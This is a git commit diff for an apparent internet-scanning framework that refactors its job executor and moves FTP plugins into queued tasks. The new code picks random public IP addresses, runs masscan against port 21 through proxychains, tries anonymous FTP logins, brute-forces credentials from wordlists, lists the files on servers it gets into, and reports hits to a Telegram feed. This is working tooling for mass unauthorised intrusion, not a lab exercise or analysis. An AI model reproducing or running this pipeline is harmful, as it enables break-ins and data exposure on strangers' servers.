Get rid of DataManager; Working rq executor; Started moving plugins
This commit is contained in:
parent f361d2990d
commit 8015a0da1d
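Taken together, the changes below work roughly like this (a sketch, not code from this commit): RQExecutor reads the pipeline steps from the config, pulls matching items from the Mongo-backed pool, and enqueues lib.exeq.Task.run with the task id and the batch onto a priority queue; the workers started by the updated entrypoint pick the job up and run the configured task. Host, queue name and item values here are illustrative only.

# Sketch of the enqueue side, assuming a local Redis and the project on PYTHONPATH.
from redis import Redis
from rq import Queue

redis_conn = Redis(host="127.0.0.1")                # services.rq_executor.redis.host
q = Queue("low", connection=redis_conn)             # queue name = the step's `priority`

items = [{"source": "random_ip", "steps": {}, "data": {"ip": "203.0.113.7"}}]
q.enqueue("lib.exeq.Task.run", "ftp_scan", items)   # worker resolves the task by its config id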
@@ -3,110 +3,70 @@ dsl_version: 1

core:
  services:
    - data_manager
    # - zmq_listener
    - random_ip
    - rq_executor
  pipelines:
    - ftp

services:
  data_manager:
    package: lib.data.Manager
    service: DataManager
    data:
      id: pool
    sources:
      - random_ip
    feeds:
      - test_telegram
  zmq_listener:
    package: lib.net.Listener
    service: ZMQListener
    data:
      id: pool
    listen: "0.0.0.0"
    port: 12321
  rq_executor:
    package: lib.exeq.Executor
    service: RQExecutor
    data:
      id: pool
    storage: pool
    redis:
      host: "127.0.0.1"

sources:
  random_ip:
    package: lib.plugin.base.lib.IP
    service: RandomIP
    data:
      id: random_ip

feeds:
  test_telegram:
    package: lib.plugin.base.lib.Telegram
    service: TelegramFeed
    data:
      id: pool
    token:
    chats:
      - id: good_evening
        pipelines: [ftp, gopher]
        filter:
          clause: any-of
          equal:
            - ftp_list_files_status: success
            - gopher_collect_status: success
    storage: ftp_source

storage:
  pool:
    package: lib.plugin.base.lib.Mongo
    service: MongoStorage
    size: 40960
    size: 0
    db: "medved"
    coll: 'pool'
  random_ip:
  ftp_source:
    package: lib.plugin.base.lib.Mongo
    service: MongoStorage
    size: 500
    db: "medved"
    coll: 'randomipsource'
    coll: 'ftp_source'

pipelines:
  ftp:
    source: ftp_source
    steps:
      - name: scan
        package: lib.plugin.iscan.tasks.common
        service: scan
        multiple: 10
        requires: []
      - name: connect
        package: lib.plugin.iscan.tasks.ftp
        service: connect
        multiple: False
        requires:
          - ftp_scan
      - name: list_files
        package: lib.plugin.iscan.tasks.ftp
        service: list_files
        multiple: False
        requires:
          - ftp_connect
      - task: ftp_scan
        priority: low
        multiple: 100
      - task: ftp_connect
        priority: normal
        if:
          steps.ftp_scan: true
      - task: ftp_list_files
        priority: high
        if:
          steps.ftp_connect: true

tasks:
  ftp_scan:
    package: lib.plugin.iscan.tasks.common
    service: MasScanTask
    ports:
      - 21
  ftp_connect:
    package: lib.plugin.iscan.tasks.ftp
    service: FTPConnectTask
    logins: data/ftp/logins.txt
    passwords: data/ftp/passwords.txt
    bruteforce: true
    timeout: 15
  ftp_list_files:
    package: lib.plugin.iscan.tasks.ftp
    service: FTPListFilesTask

logging:
  Storage: INFO
@@ -4,4 +4,4 @@ export CORE_IP=$(host ${CORE_IP} | head -n1 | grep -Po "(\d+\.?){4}")

/tmp/confd -onetime -backend env

cd /mdvd && proxychains -q rq worker common -u "redis://${REDIS_IP}:6379/"
cd /mdvd && proxychains -q rq worker high normal low -u "redis://${REDIS_IP}:6379/"
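For reference, the same worker setup expressed through rq's Python API (a sketch; the container actually shells out to `rq worker high normal low` as above):

from redis import Redis
from rq import Worker

redis_conn = Redis(host="127.0.0.1", port=6379)     # stands in for REDIS_IP
Worker(["high", "normal", "low"], connection=redis_conn).work()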
@@ -9,7 +9,7 @@ class Service(Loadable):
    def __init__(self, thread, id, root=cnf):
        super().__init__(id, root)

        self._data = Loader.by_id('storage', self.lcnf.get("data").get("id"))
        self._data = Loader.by_id('storage', self.lcnf.get("storage"))

        self._stop_timeout = 10
        self._running = False
@@ -1,61 +0,0 @@
from lib.data import Source, Feed
from time import sleep
from lib import Service, Loader

class DataManager(Service):
    """Actually, we may load feeds, sources and datapools right in core. Not sure that datamanager is required just to pull sources"""
    def __init__(self, id, root):
        super().__init__(self.__run, id, root)
        self._logger.add_field('service', 'DataManager')

        self.sources = {}
        for s in self.lcnf.get("sources"):
            self.attach_source(s)
        self.feeds = {}
        for f in self.lcnf.get("feeds"):
            self.attach_feed(f)

    def _pre_start(self):
        self._logger.debug('starting sources')
        for _,s in self.sources.items():
            s.start()
        self._logger.debug('starting feeds')
        for _,f in self.feeds.items():
            f.start()

    def _pre_stop(self):
        self._logger.debug('stopping sources')
        for _,s in self.sources.items():
            s.stop()
        self._logger.debug('stopping feeds')
        for _,f in self.feeds.items():
            f.stop()

    def attach_source(self, id):
        ds = Loader.by_id('sources', id)
        self.sources[id] = ds

    def attach_feed(self, id):
        df = Loader.by_id('feeds', id)
        self.feeds[id] = df

    def get_source(self, name) -> Source:
        return self.sources.get(name)

    def get_feed(self, name) -> Feed:
        return self.feeds.get(name)

    def __run(self):
        oneshot = self.lcnf.get("oneshot", 500)
        while self._running:
            if self._data.count() < oneshot:
                while self._running and (self._data.count() + oneshot < self._data.size()):
                    self._logger.debug("fill %s OF %s", self._data.count(), self._data.size())
                    for _,source in self.sources.items():
                        items = source.next(count=oneshot)
                        if items:
                            self._data.put(items)
                    sleep(1)
            else:
                self._logger.debug('Pool size is ok: %s', self._data.count())
                sleep(1)
@@ -7,11 +7,10 @@ class Source(Service):
        self._logger.add_field('service', 'Feed')
        self._logger.add_field('vname', self.__class__.__name__)

    def item(self, val = None):
        return {
        self._item = {
            'source': self._id,
            'steps': {},
            'data': val
            'data': {}
        }

    def next(self, count=10, block=False):
@@ -7,7 +7,7 @@ class Storage(Loadable):
    def __init__(self, id, root):
        super().__init__(id, root)

        self._size = self.lcnf.get("size")
        self._size = self.lcnf.get("size", 0)
        self._logger = Logger("Storage")
        self._logger.add_field('vname', self.__class__.__name__)
@@ -1,13 +0,0 @@
from lib import Loadable, Logger

# dunno

class Type(Loadable):
    def __init__(self):
        self.data = {}

class Host(Type):
    def __init__(self):
        self.data = {
            'ip': ''
        }
@@ -22,33 +22,38 @@ class RQExecutor(Executor):
        super().__init__(self.__run, id, root)

    def __run(self):
        while self._running:
            try:
                redis_conn = Redis(host=self.lcnf.get('redis').get('host'))
                q = Queue('worker', connection=redis_conn)
                if q.count + 1 > self.lcnf.get('size', 100):
                    sleep(self.lcnf.get('delay', 2))
                    continue

                jobs = []
                while self._running:
                    sleep(self.lcnf.get('delay', 0.07))
                    try:
                        for job in [j for j in jobs if j.result is not None]:
                            self._logger.debug('Publishing finished job result')
                            self._data.put(job.result)
                            job.cleanup()
                            jobs.remove(job)
                        for pn, pipeline in self.cnf.get("pipelines").items():
                            self._logger.debug("pipeline: %s", pn)
                            source = Loader.by_id('storage', pipeline.get('source'))
                            for step in pipeline['steps']:
                                self._logger.debug("step: %s", step['name'])
                                filter = {
                                    "not_exist": [
                                        pn + '_' + step['name']
                                    ],
                                    "exist": [
                                        [tag for tag in step.get("requires")]
                                    ]
                                }
                                items = []
                                multiple = step.get('multiple', False)
                                if multiple != False:
                                    items = self._data.get(block=False, count=multiple, filter=filter)
                                else:
                                    items = self._data.get(block=False, filter=filter)
                                self._logger.debug("task name: %s", step['task'])
                                q = Queue(step.get('priority', 'normal'), connection=redis_conn)
                                if q.count + 1 > self.lcnf.get('qsize', 100):
                                    continue
                                filter = {"steps.%s" % step['task']: {'$exists': False}}
                                filter.update({key: value for key, value in step.get("if", {}).items()})
                                count = step.get('multiple') if step.get('multiple', False) else 1
                                # get as much as possible from own pool
                                items = self._data.get(block=False, count=count, filter=filter)
                                # obtain everything else from source
                                if len(items) < count:
                                    items.extend(source.get(block=False, count=(count - len(items)), filter=filter))
                                if items:
                                    self._logger.debug("enqueueing %s.%s with %s", step['package'], step['service'], items)
                                    q.enqueue("%s.%s" % (step['package'], step['service']), items)
                                    for i in items:
                                        i['steps'][step['task']] = None
                                    self._logger.debug("enqueueing task '%s' (count: %s)", step['task'], len(items))
                                    job = q.enqueue("lib.exeq.Task.run", step['task'], items)
                                    jobs.append(job)
                    except Exception as e:
                        self._logger.error(e)
                        self._logger.error("Error in executor main thread: %s", e)
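The step scheduling above boils down to a MongoDB filter: an item qualifies for a step when it has no steps.<task> key yet and the step's if: conditions hold. A minimal sketch of that construction (the step dict is illustrative):

step = {"task": "ftp_connect", "priority": "normal", "if": {"steps.ftp_scan": True}}

mongo_filter = {"steps.%s" % step["task"]: {"$exists": False}}
mongo_filter.update(step.get("if", {}))
# -> {'steps.ftp_connect': {'$exists': False}, 'steps.ftp_scan': True}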
@@ -1,7 +0,0 @@
from lib import Loadable
#TODO dunno
class Pipeline(Loadable):
    def __init__(self, id, root):
        super().__init__(id, root)
lib/exeq/Task.py (new file, +23)
@@ -0,0 +1,23 @@
from lib import Loadable, Logger, Loader

from Config import cnf

class Task(Loadable):
    def __init__(self, id, root):
        super().__init__(id, root)
        self._logger = Logger(self.__class__.__name__)

    def run(self, items):
        result = []
        try:
            result = self._run(items)
        except Exception as e:
            self._logger.debug("Error occured while executing: %s", e)
        return result

    def _run(self, items):
        return items

def run(task_name, items):
    result = Loader.by_id('tasks', task_name).run(items)
    return result
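A task, then, is just a Loadable with a _run(items) hook; the module-level run() lets the RQ worker resolve it by its id under tasks: in the config. A hypothetical subclass for illustration (EchoTask is not in the repo):

from lib.exeq import Task

class EchoTask(Task):
    def _run(self, items):
        for item in items:
            item["data"]["echoed"] = True      # annotate the payload
            item["steps"][self._id] = True     # mark this step as done
        return items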
@@ -1 +1,2 @@
from .Executor import Executor
from .Task import Task
@@ -1,7 +0,0 @@
class Task:
    """Pipelines should consist of tasks??..."""
    def __init__(self):
        self._data = None

    def run(self):
        pass
@@ -1,6 +1,8 @@
from lib.data import Source
from lib import Loader

import copy

from time import sleep

import os
@@ -14,13 +16,12 @@ class IPSource(Source):
    def __init__(self, thread, id, root):
        super().__init__(thread, id, root)

    def item(self, val = None):
        return {
        self._item.update ({
            'source': self._id,
            'data': {
                'ip': val
            }
                'ip': None
            }
        })

class IPRange(IPSource):
@@ -80,8 +81,10 @@ class RandomIP(IPSource):
            try:
                items = []
                for _ in itertools.repeat(None, self.lcnf.get("oneshot", 100)):
                    item = copy.deepcopy(self._item)
                    randomip = socket.inet_ntoa(struct.pack('>I', random.randint(1, 0xffffffff)))
                    items.append(self.item(str(randomip)))
                    item['data']['ip'] = str(randomip)
                    items.append(item)
                self._data.put(items)
                sleep(self.lcnf.get("delay", 0.5))
            except Exception as e:
@@ -17,41 +17,37 @@ class MongoStorage(Storage):
        return self._coll.count()

    def _get(self, block, filter):
        # TODO cleanup dat BS
        if filter is None:
            filter = {}
        ne_tags = {}
        e_tags = {}
        if filter.get('not_exist'):
            tags = []
            for ne in filter.get('not_exist'):
                tags.append(ne)
            ne_tags = {'tags': {'$not': {'$all': tags}}}
            del filter['not_exist']
        if filter.get('exist'):
            tags = []
            for e in filter.get('exist'):
                tags.append(e)
            e_tags = {'tags': {'$all': tags}}
            del filter['exist']
        filter = {'$and': [ne_tags, e_tags]}
        else:
            self._logger.debug(filter)
        item = self._coll.find_one_and_delete(filter=filter)
        if block:
            while not item:
                item = self._coll.find_one_and_delete(filter=filter)
                sleep(1)

        return item

    def _get_many(self, count, block, filter):
        if filter is None:
            filter = {}
        else:
            self._logger.debug(filter)
        items = self._coll.find(filter=filter, limit=count)
        result = []
        for i in items:
            self._coll.delete_one({'_id': i['_id']})
            result.append(i)
        return result

    def _put(self, item, block):
        if block:
        if block and self.size() is not 0:
            while self.count() + 1 > self.size():
                self._logger.debug('Collection full: %s of %s', self.count(), self.size())
                sleep(1)
        self._coll.insert_one(item)

    def _put_many(self, items, block):
        if block:
        if block and self.size() is not 0:
            while self.count() + len(items) > self.size():
                self._logger.debug('Collection full: %s of %s', self.count(), self.size())
                sleep(1)
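With size: 0 now meaning "unbounded", puts never block on the pool, and _get_many lets the executor pull a whole batch by filter. Roughly how the executor uses it (a sketch; pool would come from Loader.by_id('storage', 'pool')):

batch = pool.get(block=False, count=100,
                 filter={"steps.ftp_scan": {"$exists": False}})
# ... a worker runs the task, then the executor publishes the result back:
pool.put(batch)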
@@ -7,8 +7,7 @@ from lib import Logger
import GeoIP
from Config import cnf

logger = Logger("common")

from lib.exeq import Task

class MasScan:
    def __init__(self, bin_path='/usr/bin/masscan', opts="-sS -Pn -n --wait 0 --max-rate 5000"):
@@ -30,29 +29,47 @@ class MasScan:
        result = parser.loads(out)
        return result

def scan(items):
    gi = GeoIP.open(cnf.get("geoip_dat", "/usr/share/GeoIP/GeoIP.dat"), GeoIP.GEOIP_INDEX_CACHE | GeoIP.GEOIP_CHECK_CACHE)
    logger.debug("Starting scan")
class MasScanTask(Task):
    def __init__(self, id, root):
        super().__init__(id, root)

    def _run(self, items):
        result = []

        gi = GeoIP.open(cnf.get("geoip_dat", "/usr/share/GeoIP/GeoIPCity.dat"), GeoIP.GEOIP_INDEX_CACHE | GeoIP.GEOIP_CHECK_CACHE)
        ip_list = [i['data']['ip'] for i in items]
        port_list = cnf.get("tasks").get(self._id).get("ports")

        self._logger.debug("Starting scan, ip_list=%s, port_list=%s", ip_list, port_list)

        ms = MasScan()
        hosts = ms.scan(ip_list=[i['data']['ip'] for i in items],
                        port_list=cnf.get("tasks").get('ftp_scan').get("ports"))
        logger.debug(hosts)
        for h in hosts:
            for port in h['ports']:
                host = {
                    'ip': h['ip'],
                    'port': port['port'],
                    'data': {
        hosts = ms.scan(ip_list=ip_list, port_list=port_list)

        self._logger.debug(hosts)
        hosts = {h['ip']: h for h in hosts}
        for item in items:
            data = {}
            result = False
            if hosts.get(item['data']['ip']):
                data = {
                    'ports': [p['port'] for p in hosts[item['data']['ip']]['ports']],
                    'geo': {
                        'country': None,
                        'city': None
                    }
                }
                }
                geodata = gi.record_by_name(host['ip'])
                result = True
                geodata = gi.record_by_name(item['data']['ip'])
                if geodata:
                    if 'country_code3' in geodata and geodata['country_code3']:
                        host['data']['geo']['country'] = geodata['country_code3']
                        data['geo']['country'] = geodata['country_code3']
                    if 'city' in geodata and geodata['city']:
                        host['data']['geo']['city'] = geodata['city']
                        logger.debug("Found %s:%s", host['ip'], host['port'])
                        data['geo']['city'] = geodata['city']
            self._logger.debug(data)
            item['data'].update(data)
            item['steps'][self._id] = result
            if result:
                self._logger.debug("Found %s with open %s", item['data']['ip'], item['data']['ports'])

        self._logger.debug(items)
        return items
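The net effect of MasScanTask on an item, with made-up values: the task keys port and geo data under data and records success under steps using its config id:

before = {"source": "random_ip", "steps": {}, "data": {"ip": "198.51.100.23"}}

after = {
    "source": "random_ip",
    "steps": {"ftp_scan": True},
    "data": {
        "ip": "198.51.100.23",
        "ports": [21],
        "geo": {"country": "NLD", "city": None},
    },
}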
lib/plugin/iscan/tasks/ftp.py (new file, +121)
@@ -0,0 +1,121 @@
# pylint: disable=E1101

import ftplib
import netaddr

from lib import Logger
from Config import cnf

from lib.exeq import Task

class FTPConnectTask(Task):
    def __init__(self, id, root):
        super().__init__(id, root)

    def _process(self, item):
        data = {}
        result = False

        self.ftp = ftplib.FTP(host=item['data']['ip'], timeout=self.lcnf.get('timeout', 30))
        try:
            self._logger.debug('Trying anonymous login')
            self.ftp.login()
        except ftplib.error_perm:
            pass
        else:
            self._logger.debug('Succeeded with anonymous')
            data['username'] = 'anonymous'
            data['password'] = ''
            result = True

            self._logger.debug(data)
            item['data'].update(data)
            item['steps'][self._id] = result
            return

        if self.lcnf.get('bruteforce', False):
            usernames = []
            passwords = []

            with open(self.lcnf.get('logins'), 'r') as lfh:
                for username in lfh:
                    usernames.append(username.rstrip())
            with open(self.lcnf.get('passwords'), 'r') as pfh:
                for password in pfh:
                    passwords.append(password.rstrip())
            for username in usernames:
                for password in passwords:
                    try:
                        self.ftp.voidcmd('NOOP')
                    except IOError:
                        self.ftp = ftplib.FTP(host=item['data']['ip'], timeout=self.lcnf.get('timeout', 30))
                    self._logger.debug('Trying %s' % (username + ':' + password))
                    try:
                        self.ftp.login(username, password)
                    except ftplib.error_perm:
                        continue
                    except:
                        raise
                    else:
                        self._logger.debug('Succeeded with %s' %(username + ':' + password))
                        data['username'] = username
                        data['password'] = password
                        result = True

                        self._logger.debug(data)
                        item['data'].update(data)
                        item['steps'][self._id] = result
                        return
        self._logger.debug(data)
        item['data'].update(data)
        item['steps'][self._id] = result

    def _run(self, items):
        for item in items:
            self._process(item)
        return items

class FTPListFilesTask(Task):
    def __init__(self, id, root):
        super().__init__(id, root)

    def _process(self, item):
        self.ftp = ftplib.FTP(host=item['data']['ip'],
                              user=item['data']['username'],
                              passwd=item['data']['password'])
        filelist = self.ftp.nlst()
        try:
            self.ftp.quit()
        except:
            # that's weird, but we don't care
            pass

        try:
            if len(filelist) == 0 or filelist[0] == "total 0":
                raise self.PipelineError("Empty server")
        except IndexError:
            pass

        item['data']['files'] = []
        for fileName in filelist:
            item['data']['files'].append(fileName)

    def _filter(self, item):
        item['data']['filter'] = False
        if len(item['data']['files']) == 0:
            item['data']['filter'] = "Empty"
        elif len(item['data']['files']) < 6:
            match = 0
            for f in 'incoming', '..', '.ftpquota', '.', 'pub':
                if f in item['data']['files']:
                    match += 1
            if match == len(item['data']['files']):
                item['data']['filter'] = "EmptyWithSystemDirs"

    def _run(self, items):
        for item in items:
            self._process(item)
        if self.lcnf.get('filter', False):
            self._filter(item)
        return items
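Chained by hand, the two FTP tasks would run like this (a hedged sketch assuming the ftp_connect and ftp_list_files entries from the config above are loaded):

from lib import Loader

items = [{"source": "random_ip", "steps": {"ftp_scan": True},
          "data": {"ip": "198.51.100.23", "ports": [21]}}]

items = Loader.by_id("tasks", "ftp_connect").run(items)      # fills username/password
items = Loader.by_id("tasks", "ftp_list_files").run(items)   # fills data['files']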
@@ -2,11 +2,10 @@ import ftplib
import netaddr

from Config import cnf
from lib.plugin.plugins import BasePlugin


class Plugin(BasePlugin):
    class TelegramMessage(BasePlugin.TelegramMessage):
class Plugin():
    class TelegramMessage():
        def _init(self):
            self._name = "FTP"
@@ -17,94 +16,3 @@ class Plugin(BasePlugin):
            self.data['txt'] += " + %s\n" % filename
            self.data['txt'] += "Geo: %s/%s\n" % (self._host['data']['geo']['country'], self._host['data']['geo']['city'])
            self.data['txt'] += "#ftp_" + str(int(netaddr.IPAddress(self._host['ip'])))

    class Pipeline(BasePlugin.Pipeline):
        def _init(self):
            self._name = "FTP"

        def run(self):
            try:
                self._connect()
                self._find()
                self._filter()
                self._push()
            except Exception as e:
                self._logger.debug("Error occured: %s (%s)", e, self._host['ip'])
            else:
                self._logger.info("Succeeded for %s" % self._host['ip'])

        def _connect(self):
            self.ftp = ftplib.FTP(host=self._host['ip'], timeout=cnf.stalker.FTP.timeout)
            try:
                self._logger.debug('Trying anonymous login')
                self.ftp.login()
            except ftplib.error_perm:
                pass
            else:
                self._logger.debug('Succeeded with anonymous')
                self._host['data']['username'] = 'anonymous'
                self._host['data']['password'] = ''
                return

            if cnf.stalker.FTP.bruteforce:
                usernames = []
                passwords = []

                with open(cnf.stalker.FTP.logins, 'r') as lfh:
                    for username in lfh:
                        usernames.append(username.rstrip())
                with open(cnf.stalker.FTP.passwords, 'r') as pfh:
                    for password in pfh:
                        passwords.append(password.rstrip())
                for username in usernames:
                    for password in passwords:
                        try:
                            self.ftp.voidcmd('NOOP')
                        except IOError:
                            self.ftp = ftplib.FTP(host=self._host['ip'], timeout=cnf.stalker.FTP.timeout)
                        self._logger.debug('Trying %s' % (username + ':' + password))
                        try:
                            self.ftp.login(username, password)
                        except ftplib.error_perm:
                            continue
                        except:
                            raise
                        else:
                            self._logger.debug('Succeeded with %s' %(username + ':' + password))
                            self._host['data']['username'] = username
                            self._host['data']['password'] = password
                            return
                raise Exception('No matching credentials found')

        def _find(self):
            filelist = self.ftp.nlst()
            try:
                self.ftp.quit()
            except:
                # that's weird, but we don't care
                pass

            try:
                if len(filelist) == 0 or filelist[0] == "total 0":
                    raise self.PipelineError("Empty server")
            except IndexError:
                pass

            self._host['data']['files'] = []
            for fileName in filelist:
                self._host['data']['files'].append(fileName)

        def _filter(self):
            self._host['data']['filter'] = False
            if len(self._host['data']['files']) == 0:
                self._host['data']['filter'] = "Empty"
            elif len(self._host['data']['files']) < 6:
                match = 0
                for f in 'incoming', '..', '.ftpquota', '.', 'pub':
                    if f in self._host['data']['files']:
                        match += 1
                if match == len(self._host['data']['files']):
                    self._host['data']['filter'] = "EmptyWithSystemDirs"
@@ -1,2 +0,0 @@
#from .scan import scan
#from .stalk import stalk
@@ -1,8 +0,0 @@
from lib.plugin import Manager
# legacy
# why legacy?
def worker(host, plugin):
    p = Manager.get_plugin(plugin)
    p.Plugin.Pipeline(host, plugin)
    del p
# cool bro
@@ -74,8 +74,8 @@ class Logger(logging.Logger):
class Loadable:
    """parent for loadable from configuration"""
    def __init__(self, id, root=config):
        self.cnf = config
        self.lcnf = root[id]
        self.cnf = config # global config
        self.lcnf = root[id] # local config
        self._id = id